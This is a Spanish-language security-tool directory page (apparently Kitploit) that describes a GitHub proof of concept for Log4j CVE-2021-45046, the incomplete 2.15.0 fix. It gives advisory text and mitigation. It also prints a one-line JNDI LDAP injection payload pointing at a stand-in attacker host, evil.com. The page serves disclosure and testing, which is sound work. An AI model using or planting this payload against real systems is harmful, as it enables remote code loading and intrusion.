Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4j_CVE-2021-45046 — Log4j 2.15.0 Escalación de Privilegios -- CVE-2021-45046 | Kitploit
Herramientas/GitHubGitHub/cckuailong/log4j_cve-2021-45046
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubcckuailong/log4j_cve-2021-45046

Log4j_CVE-2021-45046

Log4j 2.15.0 Escalación de Privilegios -- CVE-2021-45046

Ver Repositorio
2278hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Log4j 2.15.0 Escalada de Privilegios -- CVE-2021-45046

Ataque

Descripción

Se descubrió que la corrección para abordar CVE-2021-44228 en Apache Log4j 2.15.0 era incompleta en ciertas configuraciones no predeterminadas. Esto podría permitir a atacantes con control sobre los datos de entrada del Thread Context Map (MDC) cuando la configuración de registro utiliza un Layout de Patrón no predeterminado con una Context Lookup (por ejemplo, $${ctx:loginId}) o un patrón de Thread Context Map (%X, %mdc o %MDC) para elaborar datos de entrada maliciosos utilizando un patrón de JNDI Lookup, resultando en un ataque de denegación de servicio (DOS). Log4j 2.15.0 restringe las búsquedas JNDI LDAP a localhost de forma predeterminada. Tenga en cuenta que las mitigaciones anteriores que involucran configuraciones como establecer la propiedad del sistema log4j2.noFormatMsgLookup en true NO mitigan esta vulnerabilidad específica. Log4j 2.16.0 soluciona este problema eliminando la compatibilidad con patrones de búsqueda de mensajes y deshabilitando la funcionalidad JNDI de forma predeterminada. Este problema se puede mitigar en versiones anteriores (<2.16.0) eliminando la clase JndiLookup del classpath (ejemplo: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

cvss 3.7 -> 9

Poc

root@kitploit:~
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}

Tema Log4shell

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

Bienvenido a contribuir en reapoc

https://github.com/cckuailong/reapoc

Descargar herramienta